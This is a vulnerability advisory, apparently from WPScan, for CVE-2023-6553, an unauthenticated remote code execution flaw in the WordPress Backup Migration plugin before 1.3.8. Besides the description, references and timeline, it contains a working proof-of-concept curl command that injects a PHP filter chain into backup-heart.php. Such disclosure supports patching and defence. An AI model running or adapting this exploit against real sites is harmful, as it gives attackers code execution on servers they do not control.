Backup Migration < 1.3.8 – Unauthenticated RCE | CVE 2023-6553 | Plugin Vulnerabilities

Description

The plugin is vulnerable to Remote Code Execution via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server.

Proof of Concept

Using the PHP Filter Chain Generator: https://github.com/synacktiv/php_filter_chain_generator

time curl -X POST http://wpscan-vulnerability-test-bench.ddev.site/wp-content/plugins/backup-backup/includes/backup-heart.php -H "Content-Dir: `python3 ./php_filter_chain_generator.py --chain '<?php system("sleep 5"); ?>' | grep --color=never '^php://filter'`"

Affects Plugins

Fixed in 1.3.8

References

CVE

URL

https://www.wordfence.com/threat-intel/vulnerabilities/id/3511ba64-56a3-43d7-8ab8-c6e40e3b686e

Classification

Type

RCE

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Nex Team

Verified

Yes

WPVDB ID

6a4d0af9-e1cd-4a69-a56c-3c009e207eca

Timeline

Publicly Published

2023-12-11 (about 2 years ago)

Added

2023-12-12 (about 2 years ago)

Last Updated

2024-01-23 (about 1 year ago)

Other

Published

Title

Published

2021-10-11

Title

Similar Posts < 3.1.6 - Admin+ Arbitrary PHP Code Execution

Published

2017-08-26

Title

Multiple Plugins - Unauthenticated RCE via PHPUnit

Published

2025-09-08

Title

WP-Members Membership Plugin < 3.5.4.3 - Authenticated (Subscriber+) Arbitrary Shortcode Execution via Profile Names

Published

2025-04-09

Title

ORDER POST <= 2.0.2 - Unauthenticated Arbitrary Shortcode Execution

Published

2025-04-23

Title

Verification SMS with TargetSMS <= 1.5 - Unauthenticated Limited Remote Code Execution